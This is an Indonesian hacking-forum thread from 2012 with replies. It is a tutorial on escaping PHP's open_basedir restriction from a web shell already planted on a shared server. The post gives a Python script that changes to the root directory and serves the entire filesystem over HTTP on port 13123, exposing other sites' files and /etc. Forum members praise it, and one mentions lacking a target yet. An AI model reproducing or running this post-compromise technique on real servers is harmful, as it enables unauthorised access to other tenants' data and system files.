Part-1: Trik jumping di server yg pake open_basedir (trik pake python)

[ketek]

Salam devilzc0ders


kali ini ane mau membagi sedikit trik cupu untuk membypass server yg di set open_basedir nya, mungkin dah bnyk yg tau, hehehe, mungkin juga blum pada tau :-p

open_basedir itu sendiri adalah settingan pada php.ini yg bisa membatasi akses php pada folder tertentu, misalkan ane set seperti ini pada php.ini

Code:

open_basedir = /var/www/dono

maka kita tidak akan bisa membuka semua dir selain /var/www/dono dan semua file dan folder didalamnya...
jadi kita gak bisa buka misalnya tetangganya /var/www/kasino atau /var/www/indro ataupun /etc dll

baca lebih jelas tentang open_basedir disini
http://id.php.net/manual/en/ini.core.php...en-basedir


misal kita udah ada shell di /var/www/dono/b374k.php
nah truz kita buka tuh shell,
ternyata kita gak bisa ke folder2 lain karena di batasi menggunakan open_basedir nya php



nah klo ketemu yg kek gini ada berbagai macam solusinya
kali ini mari kita bypass menggunakan python,
jadi python harus bisa diakses dari shell punya kita, coba cek pake

Code:

python -h

klo keluar help nya itu berarti bisa kita lanjut coba,
klo python gak bisa diakses langkah selanjutnya gak akan bisa, nanti ane buatkan thread lainnya untuk bypass yg kyk gini klo python gak bisa
save script python berikut ini dengan nama misalnya webs.py

Code:

#!/usr/bin/env python
# devilzc0de.org (c) 2012
import SimpleHTTPServer
import SocketServer
import os

port = 13123

if __name__=='__main__':
    os.chdir('/')
    Handler = SimpleHTTPServer.SimpleHTTPRequestHandler

    httpd = SocketServer.TCPServer(("", port), Handler)

    print("Now open this server on webbrowser at port : " + str(port))
    print("example: http://maho.com:" + str(port))
    httpd.serve_forever()

http://pastebin.com/vPFCVu7h



script tersebut diatas akan pindah ke root directory, lalu menjalankan SimpleHTTPServer yg listen pada port 13123

jalankan script python kita dengan perintah

Code:

python webs.py

klo udah , biarin aja tabs nya loading gitu,
sekarang buka websitenya di port 13123
misalkan target nya http://jablay.com/
maka buka di http://jablay.com:13123


oke selamat bereksplorasi



tambahan screenshot, request dari om bunga


sekian tutor cupu dari ane

[tabun]

wkwkwkkw...
keren nih tutornya omz buket...
ane izin pelajari dulu ya omz, blom dapet target soalnya..

[wahyu_devilzc0de™]

mantrappp jaya

[ketek]

asdasdasdadsada <-- gagal pertamax

[eidelweiss]

setelah di run tuh script terus buka di browser dengan port yg telah di buat..

coba om screenshot isi dari dir /var/www

[ketek]

(02-03-2012 01:45 AM)eidelweiss Wrote:  setelah di run tuh script terus buka di browser dengan port yg telah di buat..

coba om screenshot isi dari dir /var/www

[eidelweiss]

(02-03-2012 01:48 AM)xɛTɜx Wrote:  

(02-03-2012 01:45 AM)eidelweiss Wrote:  setelah di run tuh script terus buka di browser dengan port yg telah di buat..

coba om screenshot isi dari dir /var/www

[img

[img <= apaan begini doang

[ditatompel]

abgan banget nih...
Ditunggu tutorial bypassnya klo pythonnya kaga bisa di run om..

[ketek]

wakakaka sorry, sambil makan tu udah dibenerin

[badwolves1986 [RJ]]

wah keren bg ketek ane ijin bookmark buat